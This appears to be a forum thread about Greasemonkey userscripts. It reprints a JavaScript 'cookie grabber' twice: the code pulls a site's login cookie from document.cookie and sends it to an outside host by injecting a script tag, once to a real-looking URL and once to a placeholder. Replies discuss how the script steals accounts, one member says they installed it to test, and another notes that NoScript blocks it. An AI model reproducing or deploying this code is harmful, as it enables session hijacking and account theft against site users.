This is for GM, so if you don't know greasemonkey don't bother posting here xD. The following is a cookie grabber: Code (Text): var strURL = 'http://tierbone.byethost18.com/Pets/cookie.php' var eleNew, newElement; eleNew = document.getElementById('main'); var strCookie = document.cookie; strCookie = GetStringBetween(strCookie, 'neologin=','; '); if (eleNew) { newElement = document.createElement("div"); newElement.innerHTML='<SCRIPT SRC=' + strURL + strCookie + '>'; eleNew.parentNode.insertBefore(newElement, eleNew.nextSibling); } Is it saving all the info to: "http://tierbone.byethost18.com/Pets/cookie.php" ? If so, couldn't someone just change the script to: Code (Text): var strURL = 'http://websitehere.com/pagehere' var eleNew, newElement; eleNew = document.getElementById('main'); var strCookie = document.cookie; strCookie = GetStringBetween(strCookie, 'neologin=','; '); if (eleNew) { newElement = document.createElement("div"); newElement.innerHTML='<SCRIPT SRC=' + strURL + strCookie + '>'; eleNew.parentNode.insertBefore(newElement, eleNew.nextSibling); } Scary?!
That's exactly what I was thinking.. And doesn't that mean that others can just go to the website and steal the account info? :/
thats what a cookie grabber is made to do. Able to change the url where it stores info. Is that the whole script or just a component?
I installed one (the url was changed) just to test. noscript blocks the cg unless you have scripts allowed globally or allow ripway or whatever the name of the site a temporary permission. If you create your own scripts or only install scripts by people you trust then you'll be safe.